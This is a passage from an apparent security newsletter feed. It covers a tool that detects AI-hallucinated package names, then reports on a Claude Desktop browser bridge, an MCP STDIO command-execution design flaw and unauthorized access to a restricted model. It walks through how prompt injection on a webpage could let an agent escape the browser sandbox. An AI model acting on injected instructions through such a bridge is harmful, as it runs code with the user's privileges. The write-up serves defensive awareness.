</code></pre></div><p><strong>Running it on a production project</strong></p><p>I pointed it at the requirements.txt for Future Scan, a Django project I maintain which includes 100 Python dependencies, a mix of hand-picked packages and transitive deps. The command I used was:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;16e894b7-cb95-45eb-8086-026e939bc849&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">slopcheck scan requirements.txt
</code></pre></div><p>It checked all 100 packages in parallel against PyPI and came back in a few seconds. The output is color-coded and easy to scan:</p><ul><li><p><strong>[OK]</strong> &#8212; Package exists, looks legitimate. 98 of my 100 deps got this.</p></li><li><p><strong>[SUS]</strong> &#8212; Package exists but something about it raised a flag. I got two of these.</p></li><li><p><strong>[SLOP]</strong> &#8212; Package doesn&#8217;t exist in the registry at all. This is the real danger zone; if an LLM told you to install it, someone could register malware under that name tomorrow. (I didn&#8217;t get any of these on this project, which was reassuring.)</p></li></ul><p><strong>The false positives were easy to sort out</strong></p><p>Both of my [SUS] flags were Levenshtein near-misses. Slopcheck thought they might be typosquats of more popular packages:</p><p><code>hiredis</code> got flagged as suspiciously close to <code>redis</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;e1501ed9-7f0e-455b-9418-ee5e36af787c&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">[SUS] hiredis (pypi)
&gt; Suspiciously close to 'redis'. Could be a typosquat.
? Did you mean: redis
</code></pre></div><p><code>numba</code> got flagged as suspiciously close to <code>numpy</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;5f773f21-d107-40aa-85bd-df645f0bab2a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">[SUS] numba (pypi)
&gt; Suspiciously close to 'numpy'. Could be a typosquat.
? Did you mean: numpy
</code></pre></div><p>Both are completely legitimate: <code>hiredis</code> is the official C parser for redis-py, and <code>numba</code> is Anaconda&#8217;s JIT compiler with tens of millions of monthly downloads.</p><p>It also added informational notes on packages like <code>python-dateutil</code> and <code>python-dotenv</code>, calling out the <code>python-*</code> prefix as a &#8220;classic LLM naming pattern&#8221; but acknowledging both are established.</p><p><strong>Did I use it again?</strong></p><p>As you can see in the demo, I used it to check my packages.json file in CarouselBot, a React project.</p><p>I&#8217;ve also added a note for Claude to run slopcheck before it installs new packages and alert me to anything, well, SUS.</p><p>One more hassle I can cross off my list!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sNut!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sNut!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 424w, https://substackcdn.com/image/fetch/$s_!sNut!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 848w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1272w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sNut!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png" width="1165" height="746" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:746,&quot;width&quot;:1165,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:70223,&quot;alt&quot;:&quot;slopcheck Scan: 100 Django Deps Horizontal bar of Karen's real-world scan: 98 OK, 2 SUS, 0 SLOP. The practical \&quot;what it looks like in the chair\&quot; chart.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194702932?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="slopcheck Scan: 100 Django Deps Horizontal bar of Karen's real-world scan: 98 OK, 2 SUS, 0 SLOP. The practical &quot;what it looks like in the chair&quot; chart." title="slopcheck Scan: 100 Django Deps Horizontal bar of Karen's real-world scan: 98 OK, 2 SUS, 0 SLOP. The practical &quot;what it looks like in the chair&quot; chart." srcset="https://substackcdn.com/image/fetch/$s_!sNut!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 424w, https://substackcdn.com/image/fetch/$s_!sNut!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 848w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1272w, https://substackcdn.com/image/fetch/$s_!sNut!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F36704774-c6d2-4d96-b308-cfeb6d92f820_1165x746.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>More from Karen.</strong> <a href="https://wonderingaboutai.substack.com/">Wondering About AI</a> covers agentic tools from the builder&#8217;s chair. Subscribe for the user-side perspective security folks keep forgetting exists.</p><div><hr></div><p><strong>Back to Tox.</strong></p><h2>How slopcheck Catches Hallucinated Packages</h2><p>slopcheck is a free, <a href="https://github.com/0xToxSec/slopcheck">open-source CLI</a> that queries every dependency in your project against the live package registry before anything touches your environment. Seven ecosystems out of the box: PyPI, npm, crates.io, Go modules, RubyGems, Maven and Gradle, and Packagist.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;cef7985b-f453-4a50-9455-034e006533e9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># one and done
pip install slopcheck &amp;&amp; slopcheck init
</code></pre></div><p>The detection logic layers multiple signals instead of trusting a single flag:</p><ul><li><p><strong>[SLOP]</strong> is the hard block. The name doesn&#8217;t resolve on the registry at all. Do not install.</p></li><li><p><strong>[SUS]</strong> is the yellow light. The package exists but the profile is off: registered in the last seven days, fewer than 100 total downloads, hallucination-pattern naming like <code>{popular-lib}-helper</code> or <code>{real-pkg}-utils</code>, or no source repository link. Look before you install.</p></li><li><p><strong>[OK]</strong> is clean. Established, downloaded, linked to a real repo.</p></li></ul><p>slopcheck also runs a Levenshtein distance check against the most popular packages in each ecosystem, which catches classic typosquats with a &#8220;did you mean?&#8221; correction. Someone aims for <code>requests</code>, gets `<code>reqeusts`</code>, slopcheck flags it before pip runs.</p><p>The modes that matter day to day:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;bc245569-0daf-49d4-babb-9beb7c52b1d6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># auto-detect every dep file in the project
slopcheck .

# safe install: verify first, only clean deps reach pip
slopcheck install flask requests sketchy-package

# auto-remove hallucinated packages from dep files
slopcheck . --fix

# pre-commit git hook that blocks slop before every commit
slopcheck init
</code></pre></div><p>Safe install mode wraps your real package manager. It checks every name, blocks anything flagged as slop, skips suspicious packages unless you pass <code>--force</code>, and only hands the clean list to pip or npm once the gate is clear. The <code>--fix</code> flag auto-removes hallucinated packages from your dep files, commenting them out with <code># [slopcheck] removed:</code> so the kill history stays visible in the diff.</p><p>Internal packages that won&#8217;t exist on public registries? <code>.slopcheck</code> allowlists handle it. CI pipelines? <code>--json</code> output is machine-readable, and a GitHub Action scans every PR that touches dependency files. Slop detected fails the check and drops a report comment directly on the PR. Block at merge time, not at deploy time.</p><p>slopcheck is MIT licensed. <code>pip install slopcheck</code> and you&#8217;re running. Scans a full project in about a second on most hardware. The code lives on GitHub if you want to read it, fork it, or tear it apart.</p><p>The registry is the trust boundary most devs never think about, the same way nobody thought about model weights until <a href="https://www.toxsec.com/p/local-model-security-gemma-4">pickle files on Hugging Face started shipping backdoors</a>. Every place AI output touches a public ecosystem is a new attack surface.</p><div><hr></div><p><em>Karen, closing us out:</em></p><h3>A note for fellow builders</h3><p>I mostly build tools because I love making my life easier for me and my customers. (I&#8217;m currently working on a few custom development projects in addition to <a href="https://www.carouselbot.app/about">CarouselBot</a> and <a href="https://futurescan.org/">Future Scan</a>.)</p><p>But I recognize that security, while perhaps less exciting for me, is important too. If something goes wrong, it can damage relationships and businesses.</p><p>While slopsquatting is just one of many security issues all of us building with AI need to consider, it&#8217;s also one of the easiest to manage once you&#8217;re aware of it&#8230;and, especially if you use slopcheck.</p><div><hr></div><p><strong>Follow Karen.</strong> Catch her on Substack at <a href="https://substack.com/@karenspinner1">@karenspinner1</a> or subscribe directly to Wondering About AI. </p><div class="embedded-publication-wrap" data-attrs="{&quot;id&quot;:5597038,&quot;name&quot;:&quot;Wondering About AI&quot;,&quot;logo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!B3X6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F721dac90-0e32-4c6d-a6bc-172d3fab26e6_1080x1080.png&quot;,&quot;base_url&quot;:&quot;https://wonderingaboutai.substack.com&quot;,&quot;hero_text&quot;:&quot;I build tools with Claude Code and other AI platforms and share exactly what works (and what flames out). Now I'm helping other vibe coders break through barriers and get their projects done.&quot;,&quot;author_name&quot;:&quot;Karen Spinner&quot;,&quot;show_subscribe&quot;:true,&quot;logo_bg_color&quot;:&quot;#ffffff&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="EmbeddedPublicationToDOMWithSubscribe"><div class="embedded-publication show-subscribe"><a class="embedded-publication-link-part" native="true" href="https://wonderingaboutai.substack.com?utm_source=substack&amp;utm_campaign=publication_embed&amp;utm_medium=web"><img class="embedded-publication-logo" src="https://substackcdn.com/image/fetch/$s_!B3X6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F721dac90-0e32-4c6d-a6bc-172d3fab26e6_1080x1080.png" width="56" height="56" style="background-color: rgb(255, 255, 255);"><span class="embedded-publication-name">Wondering About AI</span><div class="embedded-publication-hero-text">I build tools with Claude Code and other AI platforms and share exactly what works (and what flames out). Now I'm helping other vibe coders break through barriers and get their projects done.</div><div class="embedded-publication-author-name">By Karen Spinner</div></a><form class="embedded-publication-subscribe" method="GET" action="https://wonderingaboutai.substack.com/subscribe?"><input type="hidden" name="source" value="publication-embed"><input type="hidden" name="autoSubmit" value="true"><input type="email" class="email-input" name="email" placeholder="Type your email..."><input type="submit" class="button primary" value="Subscribe"></form></div></div><h2>Frequently Asked Questions</h2><h3>What&#8217;s the difference between slopsquatting and typosquatting?</h3><p>Typosquatting waits for a human to mistype a package name. The attacker registers <code>reqeusts</code> and lives off the fat-fingers. Slopsquatting skips the human error entirely. The AI hallucinates the name, the attacker pre-registers it, and the dev copy-pastes the install command without thinking. Registries run collision detection for names similar to existing packages, but hallucinated names are brand-new strings with no collision. The attack scales because the hallucinations are predictable across prompts, models, and ecosystems.</p><h3>Has slopsquatting been used in a confirmed cyberattack?</h3><p>No large-scale breach has been publicly pinned to slopsquatting as of 2026. The precursors are real. A harmless test package under the hallucinated name <code>huggingface-cli</code> pulled 30,000 downloads in three months. An npm package called <code>react-codeshift</code> spread through 237 repositories via AI-generated agent infrastructure with nobody planting it deliberately. The gap between proof-of-concept and weaponized supply chain attack is a free registry account and a malicious install hook. That gap is small.</p><h3>How does slopcheck work across multiple ecosystems?</h3><p>slopcheck parses dependency files automatically: <code>requirements.txt</code> and <code>pyproject.toml</code> for Python, <code>package.json</code> for JavaScript, <code>Cargo.toml</code> for Rust, <code>go.mod</code> for Go, <code>Gemfile</code> for Ruby, <code>pom.xml</code> and <code>build.gradle</code> for Java, and <code>composer.json</code> for PHP. Every dependency gets checked against its ecosystem&#8217;s live registry. The tool runs checks in parallel with ten workers by default, so scanning a full project typically finishes in under a second. Package managers aren&#8217;t invoked until the verification gate is clear.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p><p>Karen Spinner writes Wondering About AI, where she covers agentic AI tools from the chair of someone who uses them daily. She brings the user perspective security researchers forget exists.</p>]]></content:encoded></item><item><title><![CDATA[Is Claude Code Secretly Installing Spyware?]]></title><description><![CDATA[A researcher caught Claude Desktop installing browser bridges silently. Plus the MCP RCE Anthropic won&#8217;t patch.]]></description><link>https://www.toxsec.com/p/is-claude-code-spyware</link><guid isPermaLink="false">https://www.toxsec.com/p/is-claude-code-spyware</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 26 Apr 2026 18:09:39 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/195466711/ae6bd57b08b8db64cab2a83be4e39183.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>So Is Claude Code Spyware or What?</h2><p>Quick answer: no. The headline is sticky for a reason though.</p><p>April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: <code>com.anthropic.claude_browser_extension.json</code>. It&#8217;s sitting in his Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren&#8217;t actually installed yet.</p><p>A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches.</p><p>Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press.</p><p>Hanff <a href="https://www.thatprivacyguy.com/blog/anthropic-spyware/">calls it spyware</a>. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the <strong>&#8220;spyware&#8221;</strong> label. The consensus middle ground is &#8220;dark pattern,&#8221; and the EU framing is sharper.</p><p>Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response.</p><p>So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. We&#8217;ve watched <a href="https://www.toxsec.com/p/the-magic-string-that-bricks-claude">Anthropic ship things they didn&#8217;t think through before</a>. This one has wiring.</p><h2>From Manifest to Sandbox Escape</h2><p>Here&#8217;s the chain.</p><p>A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can&#8217;t reach your files. That wall is the entire reason the modern browser exists.</p><p>Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That&#8217;s a feature. The bug is who gets to authorize the hole.</p><p>The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed.</p><p>Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge.</p><p>Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic&#8217;s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures.</p><p>The injected agent now has a green-lit tunnel to a binary running with your user permissions. <strong>Outside the sandbox.</strong></p><p>Anthropic&#8217;s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We&#8217;ve covered <a href="https://www.toxsec.com/p/openclaw-is-a-wildly-insecure">agents that escape sandboxes via prompt injection</a> before. The shape is familiar.</p><p>That&#8217;s why the spyware label keeps sticking even when the technical purists object. The keys are pre-positioned. One downstream injection turns them.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!EiVI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!EiVI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 424w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 848w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1272w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!EiVI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png" width="612" height="821.0322580645161" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1414,&quot;width&quot;:1054,&quot;resizeWidth&quot;:612,&quot;bytes&quot;:132650,&quot;alt&quot;:&quot;Sandbox Escape: Flow &#8594; Claude Code malware question answered: five-stage attack flow diagram showing Claude Desktop install, silent Native Messaging manifest drop into 7 browsers, extension pre-authorization, hostile webpage prompt injection, and code execution outside the browser sandbox at user privilege.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/195466711?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Sandbox Escape: Flow &#8594; Claude Code malware question answered: five-stage attack flow diagram showing Claude Desktop install, silent Native Messaging manifest drop into 7 browsers, extension pre-authorization, hostile webpage prompt injection, and code execution outside the browser sandbox at user privilege." title="Sandbox Escape: Flow &#8594; Claude Code malware question answered: five-stage attack flow diagram showing Claude Desktop install, silent Native Messaging manifest drop into 7 browsers, extension pre-authorization, hostile webpage prompt injection, and code execution outside the browser sandbox at user privilege." srcset="https://substackcdn.com/image/fetch/$s_!EiVI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 424w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 848w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1272w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>The MCP RCE Anthropic Won&#8217;t Patch</h2><p>Same week, Ox Security drops <a href="https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/">an advisory titled &#8220;The Mother of All AI Supply Chains.&#8221;</a></p><p>The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We&#8217;ve covered MCP attacks at length, including <a href="https://www.toxsec.com/p/lets-poison-the-mcp">tool poisoning</a> and the <a href="https://www.toxsec.com/p/secure-your-mcp">defensive playbook</a>.</p><p>This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It&#8217;s an architectural design decision baked into Anthropic&#8217;s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense.</p><p>The trick is brutally simple. MCP&#8217;s STDIO transport, that&#8217;s standard input/output, runs the configured command to spin up a tool server.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;d4caca05-77f2-499c-aa9b-691260488ae0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># Anthropic's MCP STDIO transport, simplified
$ &lt;command&gt;
# command runs, server fails to spawn, MCP returns "error"
# but the OS already executed
</code></pre></div><p>If the command successfully creates an STDIO server it returns the handle, but when given a different command, it returns an error after the command is executed. So a malicious MCP entry on a marketplace doesn&#8217;t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once.</p><p>Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances.</p><p>Anthropic&#8217;s response: <strong>&#8220;expected&#8221; behavior</strong>. They declined to modify the protocol. A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed.</p><h2>How Did Mythos Leak to a Random Discord?</h2><p>Now for the third act.</p><p>Mythos is Anthropic&#8217;s restricted vulnerability-hunting model. Released April 10 to select partners under &#8220;Project Glasswing,&#8221; roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release.</p><p>The chain reads like a textbook walkthrough.</p><p>AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic.</p><p>The member&#8217;s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path.</p><p>The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic.</p><p>A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. <strong>Bloomberg.</strong></p><p>If a Discord group in their basement got there first, assume Beijing and Moscow followed. &#8220;If some group, some random Discord online forum, got access to it, it&#8217;s already been breached by China,&#8221; David Lindner of Contrast Security <a href="https://fortune.com/2026/04/23/anthropic-mythos-leak-dario-amodei-ceo-cybersecurity-hackers-exploits-ai/">told Fortune</a>. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required.</p><p>That&#8217;s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is Claude Code malware or spyware?</h3><p>No, Claude Code is the legitimate 